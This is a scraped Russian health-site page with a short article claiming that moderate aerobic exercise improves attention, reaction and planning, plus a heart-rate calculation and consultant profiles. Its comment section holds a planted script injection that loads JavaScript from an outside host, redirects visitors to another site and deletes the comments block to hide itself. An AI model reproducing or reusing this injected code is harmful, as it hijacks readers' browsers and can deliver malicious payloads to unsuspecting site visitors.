Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Упражнения для мозга  >>  Упражнения для мозга
 
Обратная связь
 

Упражнения для мозга

Размер шрифта
17 октября 2011 07:02
  • google_analytics: false
  • Нравится

Действительно ли физкультура полезна для мыслительной деятельности? И как это работает?



Польза для физического состояния организма от спортивных упражнений очевидна и легко измеряется обычными весами. А вот пользу для умственной деятельности измерить сложнее. Тем не менее она есть.

Умеренно активные аэробные упражнения благотворно влияют на мыслительные способности:

  • Улучшают реакцию

  • Улучшают восприятие

  • Усиливают воображение

  • Повышают внимание

  • Повышают способности к планированию

Голова начинает работать лучше через 20 минут после начала занятий. Больше 40 минут заниматься не стоит: на первый план выйдет усталость, и работа мысли, наоборот, ухудшится. Что значит «умеренная интенсивность» занятий? Это означает, что во время тренировки сердечный ритм не должен превышать 75% максимальной частоты сердечных сокращений (ЧСС) в минуту.

Как рассчитать ЧСС?


  1. Нужно вычесть свой возраст из 220. К примеру, если вам 35, отнимите это число от 220: 220 – 35= 185. Получившееся число (в нашем случае 185) и есть ваша максимальная ЧСС. А 75% от нее равно 138. Значит, именно 138 ударов в минуту должно делать сердце во время тренировки.

  2. Теперь сосчитайте количество ударов пульса за 10 секунд и умножьте полученное число на 6, и вы узнаете ЧСС на данный момент. Следите за тем, чтобы во время тренировки ЧСС не превышала пределов 75%, в нашем случае – 138.

Положительный эффект от такой зарядки для мозгов связан с тем, что к мозгу поступает больше крови, а нервные клетки производят больше трансмиттеров (химических веществ, которые передают сигналы между клетками мозга). При физической активности улучшается работа нервной системы и повышается выработка адреналина. И то и другое – положительные факторы для мозговой активности.

Кстати, многочисленные исследования доказывают, что те, кто регулярно занимается физическими упражнениями, теряют меньше мозговой ткани с возрастом, и у них меньше шансов на развитие возрастных нарушений мыслительной деятельности.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.